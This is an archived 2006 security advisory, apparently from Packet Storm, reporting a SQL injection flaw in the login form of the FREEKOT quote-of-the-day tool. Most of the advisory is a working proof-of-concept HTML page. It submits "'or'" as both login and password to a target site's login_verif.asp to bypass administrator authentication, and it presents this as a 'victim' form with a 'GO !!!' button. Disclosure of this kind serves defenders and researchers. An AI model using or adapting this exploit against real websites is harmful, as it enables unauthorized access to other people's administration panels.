what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

kapda-56.txt

kapda-56.txt
Posted Sep 7, 2006
Authored by FarhadKey | Site kapda.ir

FREEKOT is susceptible to SQL injection attacks.

tags | exploit, sql injection
SHA-256 | 4e595998b902128f09204673d15ebe9508a978d03a9deb1ab49b0b585e0da9de
Download | Favorite | View

kapda-56.txt

Change Mirror Download
KAPDA New advisory

Vendor: http://www.digiappz.com
Vulnerability: SQL_Injection

Date :
--------------------
Found : Aug 10, 2006
Vendor Contacted : N/A
Release Date : Aug 30, 2006

About Freekot :
--------------------
FREEKOT is a free tool which allows you to insert a random quotation system or a quote of the day in your website.

Vulnerability:
--------------------
SQL_Injection:
Input passed to the "login" and "password" parameters when logging into the administration section isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

PoC:
--------------------
save as html.

<head><title>KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass exploit </title></head>
<body bgcolor="black">
<script language="JavaScript">
function egxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter victim site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action=document.xplt.victim.value+"/login_verif.asp";
    xplt.login.value=document.xplt.login.value;
    xplt.password.value=document.xplt.password.value;
    xplt.submit();
  }
}
</script><font face=Verdana size=2 color="#00FF00"><center><b>KAPDA :: Freekot SQL-Injection Vulnerability<br>
Discovered and coded by FarhadKey From KAPDA.IR<br>
Special Thx to Hessam-x From Anti-Security.net (Hackerz.ir)<br></b>
<form name="xplt" method="post" onsubmit="egxpl();">
<br>Victim Path : (insert http:// for path)<br>
<input type="text" name="victim" value="http://www.victim.com/FreeKot_Path/" size="44" class="xpl" style="color: #00FF00; background-color: #000000"><br>
<input type="hidden" name="login" value="'or'">
<input type="hidden" name="password" value="'or'"><br>
<!-- Discovered and coded by FarhadKey . Kapda.ir -->
<input type="submit" value="GO !!!" style="color: #00FF00; background-color: #000000">
</form></body></html>

Solution:
--------------------
No patch`s released yet by vendor.

Original Advisory:
--------------------
http://www.kapda.ir/advisory-410.html

Credit :
--------------------
FarhadKey of KAPDA
farhadkey [at} kapda <d0t> ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close